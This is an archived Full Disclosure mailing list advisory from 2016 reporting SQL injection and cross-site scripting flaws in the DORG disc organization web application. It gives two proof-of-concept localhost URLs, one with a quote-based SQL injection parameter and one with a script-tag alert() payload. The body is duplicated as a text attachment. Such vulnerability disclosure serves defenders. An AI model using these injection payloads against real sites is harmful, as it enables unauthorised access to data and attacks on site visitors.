[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] DORG - Disc Organization System SQL Injection And Cross Site Scripting
From:       SECUPENT Research Center <research () secupent ! com>
Date:       2016-03-20 12:33:38
Message-ID: 15394043c1b.dfd43a6d105993.2398635986428028931 () secupent ! com
[Download RAW message or body]

Exploit Title:  DORG - Disc Organization System SQL Injection And Cross Site Scripting 
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016




SQL Injection: 


link: http://localhost/dorg/results.php?q=3&amp;search=%2527&amp;type=3


Screenshot: http://secupent.com/exploit/images/drogsql.jpg


Cross Site Scripting (XSS):


link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&amp;search=Search&amp;type=3



Screenshot: http://secupent.com/exploit/images/drogxss.jpg


["drog.txt" (text/plain)]

Exploit Title:  DORG - Disc Organization System SQL Injection And Cross Site Scripting 
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016


SQL Injection: 

link: http://localhost/dorg/results.php?q=3&search=%2527&type=3

Screenshot: http://secupent.com/exploit/images/drogsql.jpg

Cross Site Scripting (XSS):

link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3


Screenshot: http://secupent.com/exploit/images/drogxss.jpg



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic